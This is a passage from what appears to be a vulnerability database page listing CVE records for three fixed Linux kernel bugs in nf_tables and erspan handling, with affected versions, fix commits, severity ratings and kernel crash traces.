"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.604Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a6411f3c48f991c19aaf9a24fce36865fbba28d7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae4360cbd385f0d7a8a86d5723e50448cc6318f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/31ea574aeca1aa488e18716459bde057217637af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/664264a5c55bf97a9c571c557d477b75416199be"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c9302a6da262e6ab6a6c1d30f04a6130ed97376"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2135bbf14949687e96cabb13d8a91ae3deb9069"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6f2496366426cec18ba53f1c7f6c3ac307ca6a95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bccebf64701735533c8db37773eeacc6566cc8ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26835",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:48:51.357992Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:28.802Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a6411f3c48f991c19aaf9a24fce36865fbba28d7",
"status": "affected",
"version": "bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3",
"versionType": "git"
},
{
"lessThan": "ae4360cbd385f0d7a8a86d5723e50448cc6318f3",
"status": "affected",
"version": "e10f661adc556c4969c70ddaddf238bffdaf1e87",
"versionType": "git"
},
{
"lessThan": "31ea574aeca1aa488e18716459bde057217637af",
"status": "affected",
"version": "d9c4da8cb74e8ee6e58a064a3573aa37acf6c935",
"versionType": "git"
},
{
"lessThan": "664264a5c55bf97a9c571c557d477b75416199be",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "0c9302a6da262e6ab6a6c1d30f04a6130ed97376",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "f2135bbf14949687e96cabb13d8a91ae3deb9069",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "6f2496366426cec18ba53f1c7f6c3ac307ca6a95",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "bccebf64701735533c8db37773eeacc6566cc8ec",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "5.4.262",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.10.202",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: set dormant flag on hook register failure\n\nWe need to set the dormant flag again if we fail to register\nthe hooks.\n\nDuring memory pressure hook registration can fail and we end up\nwith a table marked as active but no registered hooks.\n\nOn table/base chain deletion, nf_tables will attempt to unregister\nthe hook again which yields a warn splat from the nftables core."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:35.908Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a6411f3c48f991c19aaf9a24fce36865fbba28d7"
},
{
"url": "https://git.kernel.org/stable/c/ae4360cbd385f0d7a8a86d5723e50448cc6318f3"
},
{
"url": "https://git.kernel.org/stable/c/31ea574aeca1aa488e18716459bde057217637af"
},
{
"url": "https://git.kernel.org/stable/c/664264a5c55bf97a9c571c557d477b75416199be"
},
{
"url": "https://git.kernel.org/stable/c/0c9302a6da262e6ab6a6c1d30f04a6130ed97376"
},
{
"url": "https://git.kernel.org/stable/c/f2135bbf14949687e96cabb13d8a91ae3deb9069"
},
{
"url": "https://git.kernel.org/stable/c/6f2496366426cec18ba53f1c7f6c3ac307ca6a95"
},
{
"url": "https://git.kernel.org/stable/c/bccebf64701735533c8db37773eeacc6566cc8ec"
}
],
"title": "netfilter: nf_tables: set dormant flag on hook register failure",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26835",
"datePublished": "2024-04-17T10:10:02.907Z",
"dateReserved": "2024-02-19T14:20:24.181Z",
"dateUpdated": "2025-05-04T08:57:35.908Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35888 (GCVE-0-2024-35888)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-07 19:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
erspan: make sure erspan_base_hdr is present in skb->head
syzbot reported a problem in ip6erspan_rcv() [1]
Issue is that ip6erspan_rcv() (and erspan_rcv()) no longer make
sure erspan_base_hdr is present in skb linear part (skb->head)
before getting @ver field from it.
Add the missing pskb_may_pull() calls.
v2: Reload iph pointer in erspan_rcv() after pskb_may_pull()
because skb->head might have changed.
[1]
BUG: KMSAN: uninit-value in pskb_may_pull_reason include/linux/skbuff.h:2742 [inline]
BUG: KMSAN: uninit-value in pskb_may_pull include/linux/skbuff.h:2756 [inline]
BUG: KMSAN: uninit-value in ip6erspan_rcv net/ipv6/ip6_gre.c:541 [inline]
BUG: KMSAN: uninit-value in gre_rcv+0x11f8/0x1930 net/ipv6/ip6_gre.c:610
pskb_may_pull_reason include/linux/skbuff.h:2742 [inline]
pskb_may_pull include/linux/skbuff.h:2756 [inline]
ip6erspan_rcv net/ipv6/ip6_gre.c:541 [inline]
gre_rcv+0x11f8/0x1930 net/ipv6/ip6_gre.c:610
ip6_protocol_deliver_rcu+0x1d4c/0x2ca0 net/ipv6/ip6_input.c:438
ip6_input_finish net/ipv6/ip6_input.c:483 [inline]
NF_HOOK include/linux/netfilter.h:314 [inline]
ip6_input+0x15d/0x430 net/ipv6/ip6_input.c:492
ip6_mc_input+0xa7e/0xc80 net/ipv6/ip6_input.c:586
dst_input include/net/dst.h:460 [inline]
ip6_rcv_finish+0x955/0x970 net/ipv6/ip6_input.c:79
NF_HOOK include/linux/netfilter.h:314 [inline]
ipv6_rcv+0xde/0x390 net/ipv6/ip6_input.c:310
__netif_receive_skb_one_core net/core/dev.c:5538 [inline]
__netif_receive_skb+0x1da/0xa00 net/core/dev.c:5652
netif_receive_skb_internal net/core/dev.c:5738 [inline]
netif_receive_skb+0x58/0x660 net/core/dev.c:5798
tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1549
tun_get_user+0x5566/0x69e0 drivers/net/tun.c:2002
tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048
call_write_iter include/linux/fs.h:2108 [inline]
new_sync_write fs/read_write.c:497 [inline]
vfs_write+0xb63/0x1520 fs/read_write.c:590
ksys_write+0x20f/0x4c0 fs/read_write.c:643
__do_sys_write fs/read_write.c:655 [inline]
__se_sys_write fs/read_write.c:652 [inline]
__x64_sys_write+0x93/0xe0 fs/read_write.c:652
do_syscall_64+0xd5/0x1f0
entry_SYSCALL_64_after_hwframe+0x6d/0x75
Uninit was created at:
slab_post_alloc_hook mm/slub.c:3804 [inline]
slab_alloc_node mm/slub.c:3845 [inline]
kmem_cache_alloc_node+0x613/0xc50 mm/slub.c:3888
kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:577
__alloc_skb+0x35b/0x7a0 net/core/skbuff.c:668
alloc_skb include/linux/skbuff.h:1318 [inline]
alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6504
sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2795
tun_alloc_skb drivers/net/tun.c:1525 [inline]
tun_get_user+0x209a/0x69e0 drivers/net/tun.c:1846
tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048
call_write_iter include/linux/fs.h:2108 [inline]
new_sync_write fs/read_write.c:497 [inline]
vfs_write+0xb63/0x1520 fs/read_write.c:590
ksys_write+0x20f/0x4c0 fs/read_write.c:643
__do_sys_write fs/read_write.c:655 [inline]
__se_sys_write fs/read_write.c:652 [inline]
__x64_sys_write+0x93/0xe0 fs/read_write.c:652
do_syscall_64+0xd5/0x1f0
entry_SYSCALL_64_after_hwframe+0x6d/0x75
CPU: 1 PID: 5045 Comm: syz-executor114 Not tainted 6.9.0-rc1-syzkaller-00021-g962490525cff #0
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0a198e0bb8bef51ced179702ad1af6f9e3715b64 Version: cb73ee40b1b381eaf3749e6dbeed567bb38e5258 Version: cb73ee40b1b381eaf3749e6dbeed567bb38e5258 Version: cb73ee40b1b381eaf3749e6dbeed567bb38e5258 Version: cb73ee40b1b381eaf3749e6dbeed567bb38e5258 Version: cb73ee40b1b381eaf3749e6dbeed567bb38e5258 Version: cb73ee40b1b381eaf3749e6dbeed567bb38e5258 Version: cb73ee40b1b381eaf3749e6dbeed567bb38e5258 Version: 5195acd38ae48b7b5c186f522cd4351441297859 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35888",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-07T19:58:41.579179Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-07T19:58:44.817Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.504Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06a939f72a24a7d8251f84cf4c042df86c6666ac"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e54a0c79cdc2548729dd7e2e468b08c5af4d0df5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b14b9f9503ec823ca75be766dcaeff4f0bfeca85"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee0088101beee10fa809716d6245d915b09c37c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1db7fcb2b290c47c202b79528824f119fa28937d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4e3fdeecec5707678b0d1f18c259dadb97262e9d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0ac328a5a4138a6c03dfc3f46017bd5c19167446"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/17af420545a750f763025149fa7b833a4fc8b8f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/ip_gre.c",
"net/ipv6/ip6_gre.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "06a939f72a24a7d8251f84cf4c042df86c6666ac",
"status": "affected",
"version": "0a198e0bb8bef51ced179702ad1af6f9e3715b64",
"versionType": "git"
},
{
"lessThan": "e54a0c79cdc2548729dd7e2e468b08c5af4d0df5",
"status": "affected",
"version": "cb73ee40b1b381eaf3749e6dbeed567bb38e5258",
"versionType": "git"
},
{
"lessThan": "b14b9f9503ec823ca75be766dcaeff4f0bfeca85",
"status": "affected",
"version": "cb73ee40b1b381eaf3749e6dbeed567bb38e5258",
"versionType": "git"
},
{
"lessThan": "ee0088101beee10fa809716d6245d915b09c37c7",
"status": "affected",
"version": "cb73ee40b1b381eaf3749e6dbeed567bb38e5258",
"versionType": "git"
},
{
"lessThan": "1db7fcb2b290c47c202b79528824f119fa28937d",
"status": "affected",
"version": "cb73ee40b1b381eaf3749e6dbeed567bb38e5258",
"versionType": "git"
},
{
"lessThan": "4e3fdeecec5707678b0d1f18c259dadb97262e9d",
"status": "affected",
"version": "cb73ee40b1b381eaf3749e6dbeed567bb38e5258",
"versionType": "git"
},
{
"lessThan": "0ac328a5a4138a6c03dfc3f46017bd5c19167446",
"status": "affected",
"version": "cb73ee40b1b381eaf3749e6dbeed567bb38e5258",
"versionType": "git"
},
{
"lessThan": "17af420545a750f763025149fa7b833a4fc8b8f0",
"status": "affected",
"version": "cb73ee40b1b381eaf3749e6dbeed567bb38e5258",
"versionType": "git"
},
{
"status": "affected",
"version": "5195acd38ae48b7b5c186f522cd4351441297859",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/ip_gre.c",
"net/ipv6/ip6_gre.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.0"
},
{
"lessThan": "5.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.19.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.20.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nerspan: make sure erspan_base_hdr is present in skb-\u003ehead\n\nsyzbot reported a problem in ip6erspan_rcv() [1]\n\nIssue is that ip6erspan_rcv() (and erspan_rcv()) no longer make\nsure erspan_base_hdr is present in skb linear part (skb-\u003ehead)\nbefore getting @ver field from it.\n\nAdd the missing pskb_may_pull() calls.\n\nv2: Reload iph pointer in erspan_rcv() after pskb_may_pull()\n because skb-\u003ehead might have changed.\n\n[1]\n\n BUG: KMSAN: uninit-value in pskb_may_pull_reason include/linux/skbuff.h:2742 [inline]\n BUG: KMSAN: uninit-value in pskb_may_pull include/linux/skbuff.h:2756 [inline]\n BUG: KMSAN: uninit-value in ip6erspan_rcv net/ipv6/ip6_gre.c:541 [inline]\n BUG: KMSAN: uninit-value in gre_rcv+0x11f8/0x1930 net/ipv6/ip6_gre.c:610\n pskb_may_pull_reason include/linux/skbuff.h:2742 [inline]\n pskb_may_pull include/linux/skbuff.h:2756 [inline]\n ip6erspan_rcv net/ipv6/ip6_gre.c:541 [inline]\n gre_rcv+0x11f8/0x1930 net/ipv6/ip6_gre.c:610\n ip6_protocol_deliver_rcu+0x1d4c/0x2ca0 net/ipv6/ip6_input.c:438\n ip6_input_finish net/ipv6/ip6_input.c:483 [inline]\n NF_HOOK include/linux/netfilter.h:314 [inline]\n ip6_input+0x15d/0x430 net/ipv6/ip6_input.c:492\n ip6_mc_input+0xa7e/0xc80 net/ipv6/ip6_input.c:586\n dst_input include/net/dst.h:460 [inline]\n ip6_rcv_finish+0x955/0x970 net/ipv6/ip6_input.c:79\n NF_HOOK include/linux/netfilter.h:314 [inline]\n ipv6_rcv+0xde/0x390 net/ipv6/ip6_input.c:310\n __netif_receive_skb_one_core net/core/dev.c:5538 [inline]\n __netif_receive_skb+0x1da/0xa00 net/core/dev.c:5652\n netif_receive_skb_internal net/core/dev.c:5738 [inline]\n netif_receive_skb+0x58/0x660 net/core/dev.c:5798\n tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1549\n tun_get_user+0x5566/0x69e0 drivers/net/tun.c:2002\n tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048\n call_write_iter include/linux/fs.h:2108 [inline]\n new_sync_write fs/read_write.c:497 [inline]\n vfs_write+0xb63/0x1520 fs/read_write.c:590\n ksys_write+0x20f/0x4c0 fs/read_write.c:643\n __do_sys_write fs/read_write.c:655 [inline]\n __se_sys_write fs/read_write.c:652 [inline]\n __x64_sys_write+0x93/0xe0 fs/read_write.c:652\n do_syscall_64+0xd5/0x1f0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nUninit was created at:\n slab_post_alloc_hook mm/slub.c:3804 [inline]\n slab_alloc_node mm/slub.c:3845 [inline]\n kmem_cache_alloc_node+0x613/0xc50 mm/slub.c:3888\n kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:577\n __alloc_skb+0x35b/0x7a0 net/core/skbuff.c:668\n alloc_skb include/linux/skbuff.h:1318 [inline]\n alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6504\n sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2795\n tun_alloc_skb drivers/net/tun.c:1525 [inline]\n tun_get_user+0x209a/0x69e0 drivers/net/tun.c:1846\n tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048\n call_write_iter include/linux/fs.h:2108 [inline]\n new_sync_write fs/read_write.c:497 [inline]\n vfs_write+0xb63/0x1520 fs/read_write.c:590\n ksys_write+0x20f/0x4c0 fs/read_write.c:643\n __do_sys_write fs/read_write.c:655 [inline]\n __se_sys_write fs/read_write.c:652 [inline]\n __x64_sys_write+0x93/0xe0 fs/read_write.c:652\n do_syscall_64+0xd5/0x1f0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nCPU: 1 PID: 5045 Comm: syz-executor114 Not tainted 6.9.0-rc1-syzkaller-00021-g962490525cff #0"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:00.267Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/06a939f72a24a7d8251f84cf4c042df86c6666ac"
},
{
"url": "https://git.kernel.org/stable/c/e54a0c79cdc2548729dd7e2e468b08c5af4d0df5"
},
{
"url": "https://git.kernel.org/stable/c/b14b9f9503ec823ca75be766dcaeff4f0bfeca85"
},
{
"url": "https://git.kernel.org/stable/c/ee0088101beee10fa809716d6245d915b09c37c7"
},
{
"url": "https://git.kernel.org/stable/c/1db7fcb2b290c47c202b79528824f119fa28937d"
},
{
"url": "https://git.kernel.org/stable/c/4e3fdeecec5707678b0d1f18c259dadb97262e9d"
},
{
"url": "https://git.kernel.org/stable/c/0ac328a5a4138a6c03dfc3f46017bd5c19167446"
},
{
"url": "https://git.kernel.org/stable/c/17af420545a750f763025149fa7b833a4fc8b8f0"
}
],
"title": "erspan: make sure erspan_base_hdr is present in skb-\u003ehead",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35888",
"datePublished": "2024-05-19T08:34:44.428Z",
"dateReserved": "2024-05-17T13:50:33.113Z",
"dateUpdated": "2025-05-07T19:58:44.817Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36005 (GCVE-0-2024-36005)
Vulnerability from cvelistv5
Published
2024-05-20 09:48
Modified
2025-05-04 09:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: honor table dormant flag from netdev release event path
Check for table dormant flag otherwise netdev release event path tries
to unregister an already unregistered hook.
[524854.857999] ------------[ cut here ]------------
[524854.858010] WARNING: CPU: 0 PID: 3386599 at net/netfilter/core.c:501 __nf_unregister_net_hook+0x21a/0x260
[...]
[524854.858848] CPU: 0 PID: 3386599 Comm: kworker/u32:2 Not tainted 6.9.0-rc3+ #365
[524854.858869] Workqueue: netns cleanup_net
[524854.858886] RIP: 0010:__nf_unregister_net_hook+0x21a/0x260
[524854.858903] Code: 24 e8 aa 73 83 ff 48 63 43 1c 83 f8 01 0f 85 3d ff ff ff e8 98 d1 f0 ff 48 8b 3c 24 e8 8f 73 83 ff 48 63 43 1c e9 26 ff ff ff <0f> 0b 48 83 c4 18 48 c7 c7 00 68 e9 82 5b 5d 41 5c 41 5d 41 5e 41
[524854.858914] RSP: 0018:ffff8881e36d79e0 EFLAGS: 00010246
[524854.858926] RAX: 0000000000000000 RBX: ffff8881339ae790 RCX: ffffffff81ba524a
[524854.858936] RDX: dffffc0000000000 RSI: 0000000000000008 RDI: ffff8881c8a16438
[524854.858945] RBP: ffff8881c8a16438 R08: 0000000000000001 R09: ffffed103c6daf34
[524854.858954] R10: ffff8881e36d79a7 R11: 0000000000000000 R12: 0000000000000005
[524854.858962] R13: ffff8881c8a16000 R14: 0000000000000000 R15: ffff8881351b5a00
[524854.858971] FS: 0000000000000000(0000) GS:ffff888390800000(0000) knlGS:0000000000000000
[524854.858982] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[524854.858991] CR2: 00007fc9be0f16f4 CR3: 00000001437cc004 CR4: 00000000001706f0
[524854.859000] Call Trace:
[524854.859006] <TASK>
[524854.859013] ? __warn+0x9f/0x1a0
[524854.859027] ? __nf_unregister_net_hook+0x21a/0x260
[524854.859044] ? report_bug+0x1b1/0x1e0
[524854.859060] ? handle_bug+0x3c/0x70
[524854.859071] ? exc_invalid_op+0x17/0x40
[524854.859083] ? asm_exc_invalid_op+0x1a/0x20
[524854.859100] ? __nf_unregister_net_hook+0x6a/0x260
[524854.859116] ? __nf_unregister_net_hook+0x21a/0x260
[524854.859135] nf_tables_netdev_event+0x337/0x390 [nf_tables]
[524854.859304] ? __pfx_nf_tables_netdev_event+0x10/0x10 [nf_tables]
[524854.859461] ? packet_notifier+0xb3/0x360
[524854.859476] ? _raw_spin_unlock_irqrestore+0x11/0x40
[524854.859489] ? dcbnl_netdevice_event+0x35/0x140
[524854.859507] ? __pfx_nf_tables_netdev_event+0x10/0x10 [nf_tables]
[524854.859661] notifier_call_chain+0x7d/0x140
[524854.859677] unregister_netdevice_many_notify+0x5e1/0xae0
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d54725cd11a57c30f650260cfb0a92c268bdc3e0 Version: d54725cd11a57c30f650260cfb0a92c268bdc3e0 Version: d54725cd11a57c30f650260cfb0a92c268bdc3e0 Version: d54725cd11a57c30f650260cfb0a92c268bdc3e0 Version: d54725cd11a57c30f650260cfb0a92c268bdc3e0 Version: d54725cd11a57c30f650260cfb0a92c268bdc3e0 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36005",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T17:11:00.848539Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:43.082Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
